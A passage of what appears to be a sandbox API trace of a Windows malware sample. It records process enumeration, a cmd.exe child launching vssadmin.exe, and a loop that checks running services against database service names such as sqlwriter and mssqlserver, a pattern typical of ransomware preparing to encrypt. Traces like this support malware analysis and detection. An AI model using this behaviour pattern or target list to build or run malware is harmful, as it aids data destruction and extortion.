	[0043.081] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0043.081] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0043.081] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0043.082] lstrlenW (lpString="trips.exe") returned 9
	[0043.082] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0043.082] lstrlenW (lpString="tumormanual.exe") returned 15
	[0043.082] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0043.082] lstrlenW (lpString="telecom.exe") returned 11
	[0043.083] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0043.083] lstrlenW (lpString="realistic.exe") returned 13
	[0043.083] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0043.083] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0043.083] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0043.084] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0043.084] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0043.157] lstrlenW (lpString="cmd.exe") returned 7
	[0043.157] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0043.158] lstrlenW (lpString="conhost.exe") returned 11
	[0043.158] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0043.158] lstrlenW (lpString="vssadmin.exe") returned 12
	[0043.158] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0043.159] lstrlenW (lpString="VSSVC.exe") returned 9
	[0043.159] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.159] lstrlenW (lpString="svchost.exe") returned 11
	[0043.159] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0043.160] CloseHandle (hObject=0x1c0) returned 1
	[0043.160] Sleep (dwMilliseconds=0x1f4) 
	[0043.967] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7df3058
	[0043.968] EnumServicesStatusExW (in: hSCManager=0x7df3058, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0043.968] GetLastError () returned 0xea
	[0043.968] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb4b70c0
	[0043.969] EnumServicesStatusExW (in: hSCManager=0x7df3058, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4b70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4b70c0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0043.969] CloseServiceHandle (hSCObject=0x7df3058) returned 1
	[0043.969] lstrlenW (lpString="Appinfo") returned 7
	[0043.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0043.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0043.970] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0043.970] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0043.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0043.970] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0043.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0043.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0043.970] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0043.970] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0043.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0043.970] lstrlenW (lpString="AudioSrv") returned 8
	[0043.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0043.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0043.970] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0043.970] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0043.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0043.970] lstrlenW (lpString="BFE") returned 3
	[0043.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0043.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0043.970] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0043.970] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0043.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0043.970] lstrlenW (lpString="CryptSvc") returned 8
	[0043.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0043.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0043.970] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0043.970] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0043.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0043.970] lstrlenW (lpString="CscService") returned 10
	[0043.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0043.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0043.970] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0043.970] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0043.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0043.971] lstrlenW (lpString="DcomLaunch") returned 10
	[0043.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0043.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0043.971] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0043.971] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0043.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0043.971] lstrlenW (lpString="Dhcp") returned 4
	[0043.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0043.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0043.971] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0043.971] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0043.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0043.971] lstrlenW (lpString="Dnscache") returned 8
	[0043.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0043.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0043.971] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0043.971] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0043.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0043.971] lstrlenW (lpString="DPS") returned 3
	[0043.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0043.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0043.971] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0043.971] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0043.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0043.971] lstrlenW (lpString="eventlog") returned 8
	[0043.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0043.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0043.971] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0043.971] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0043.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0043.971] lstrlenW (lpString="EventSystem") returned 11
	[0043.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0043.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0043.971] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0043.972] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0043.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0043.972] lstrlenW (lpString="gpsvc") returned 5
	[0043.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0043.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0043.972] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0043.972] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0043.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0043.972] lstrlenW (lpString="iphlpsvc") returned 8
	[0043.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0043.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0043.972] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0043.972] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0043.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0043.972] lstrlenW (lpString="LanmanServer") returned 12
	[0043.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0043.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0043.972] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0043.972] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0043.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0043.972] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0043.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0043.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0043.972] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0043.972] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0043.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0043.972] lstrlenW (lpString="lmhosts") returned 7
	[0043.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0043.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0043.972] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0043.972] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0043.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0043.972] lstrlenW (lpString="MMCSS") returned 5
	[0043.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0043.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0043.973] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0043.973] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0043.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0043.973] lstrlenW (lpString="MpsSvc") returned 6
	[0043.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0043.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0043.973] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0043.973] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0043.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0043.973] lstrlenW (lpString="Netman") returned 6
	[0043.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0043.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0043.973] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0043.973] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0043.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0043.973] lstrlenW (lpString="netprofm") returned 8
	[0043.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0043.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0043.973] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0043.973] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0043.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0043.973] lstrlenW (lpString="NlaSvc") returned 6
	[0043.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0043.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0043.973] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0043.973] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0043.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0043.973] lstrlenW (lpString="nsi") returned 3
	[0043.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0043.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0043.973] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0043.973] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0043.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0043.973] lstrlenW (lpString="PcaSvc") returned 6
	[0043.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0043.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0043.974] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0043.974] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0043.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0043.974] lstrlenW (lpString="PlugPlay") returned 8
	[0043.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0043.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0043.974] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0043.974] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0043.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0043.974] lstrlenW (lpString="Power") returned 5
	[0043.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0043.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0043.974] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0043.974] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0043.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0043.974] lstrlenW (lpString="ProfSvc") returned 7
	[0043.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0043.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0043.974] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0043.974] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0043.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0043.974] lstrlenW (lpString="RpcEptMapper") returned 12
	[0043.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0043.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0043.974] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0043.974] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0043.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0043.974] lstrlenW (lpString="RpcSs") returned 5
	[0043.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0043.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0043.974] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0043.975] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0043.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0043.975] lstrlenW (lpString="SamSs") returned 5
	[0043.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0043.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0043.975] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0043.975] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0043.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0043.975] lstrlenW (lpString="Schedule") returned 8
	[0043.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0043.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0043.975] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0043.975] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0043.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0043.975] lstrlenW (lpString="SENS") returned 4
	[0043.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0043.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0043.975] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0043.975] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0043.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0043.975] lstrlenW (lpString="ShellHWDetection") returned 16
	[0043.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0043.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0043.975] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0043.975] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0043.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0043.975] lstrlenW (lpString="Spooler") returned 7
	[0043.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0043.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0043.975] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0043.975] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0043.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0043.975] lstrlenW (lpString="swprv") returned 5
	[0043.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0043.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0043.976] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0043.976] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0043.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0043.976] lstrlenW (lpString="SysMain") returned 7
	[0043.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0043.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0043.976] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0043.976] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0043.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0043.976] lstrlenW (lpString="Themes") returned 6
	[0043.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0043.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0043.976] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0043.976] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0043.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0043.976] lstrlenW (lpString="TrkWks") returned 6
	[0043.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0043.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0043.976] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0043.976] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0043.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0043.976] lstrlenW (lpString="UxSms") returned 5
	[0043.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0043.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0043.976] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0043.976] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0043.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0043.976] lstrlenW (lpString="VSS") returned 3
	[0043.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0043.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0043.976] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0043.976] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0043.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0043.976] lstrlenW (lpString="WdiServiceHost") returned 14
	[0043.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0043.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0043.977] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0043.977] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0043.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0043.977] lstrlenW (lpString="WdiSystemHost") returned 13
	[0043.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0043.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0043.977] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0043.977] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0043.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0043.977] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0043.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0043.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0043.977] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
